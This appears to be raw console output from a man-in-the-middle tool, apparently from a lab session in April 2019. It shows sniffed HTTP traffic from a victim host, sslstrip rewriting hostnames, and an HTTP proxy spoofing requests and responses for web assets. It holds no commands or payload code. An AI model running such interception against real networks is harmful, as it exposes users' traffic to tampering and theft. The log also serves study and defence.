 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Di...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35382
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.950878224 +0200 CEST m=+30.934988295 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-Regular.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.954260213 +0200 CEST m=+30.938370319 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-Light.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.957970811 +0200 CEST m=+30.942080923 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.981205666 +0200 CEST m=+30.965315791 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.016502408 +0200 CEST m=+31.000612522 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.043060426 +0200 CEST m=+31.027170523 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.064285794 +0200 CEST m=+31.048396045 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-Semibold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35372
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35376
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.070101032 +0200 CEST m=+31.054211224 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.102513097 +0200 CEST m=+31.086623213 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-Regular.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35380
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.111815615 +0200 CEST m=+31.095925729 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.157324667 +0200 CEST m=+31.141434780 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.180781187 +0200 CEST m=+31.164891328 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.196109594 +0200 CEST m=+31.180219699 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-Bold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.190692806 +0200 CEST m=+31.174802928 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Display-Semibold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.210755717 +0200 CEST m=+31.194865850 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35382
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.234821273 +0200 CEST m=+31.218931404 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.23910325 +0200 CEST m=+31.223213372 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-Semibold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35378
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.255322568 +0200 CEST m=+31.239432693 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.275975537 +0200 CEST m=+31.260085672 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-Light.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.288398733 +0200 CEST m=+31.272508842 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.291993672 +0200 CEST m=+31.276103837 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.31404211 +0200 CEST m=+31.298152241 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-Bold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.317990098 +0200 CEST m=+31.302100196 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.327289633 +0200 CEST m=+31.311399737 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-Semibold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.344871283 +0200 CEST m=+31.328981397 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.36081092 +0200 CEST m=+31.344921050 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.404116546 +0200 CEST m=+31.388226634 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.410477157 +0200 CEST m=+31.394587270 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.424018727 +0200 CEST m=+31.408128832 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.461033565 +0200 CEST m=+31.445143678 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Display-Semibold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.483242084 +0200 CEST m=+31.467352215 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.486453547 +0200 CEST m=+31.470563662 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.491134327 +0200 CEST m=+31.475244439 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.476070765 +0200 CEST m=+31.460180853 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35378
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35382
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Di...
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.752562408 +0200 CEST m=+31.736672477 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.762586483 +0200 CEST m=+31.746696616 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.769327494 +0200 CEST m=+31.753437620 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.786674696 +0200 CEST m=+31.770784835 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.787537479 +0200 CEST m=+31.771647587 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35384
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.854715179 +0200 CEST m=+31.838825288 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.89146236 +0200 CEST m=+31.875572489 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:04.92917785 +0200 CEST m=+31.913288032 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.934619553 +0200 CEST m=+31.918729649 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:04] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:04.96150287 +0200 CEST m=+31.945612986 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
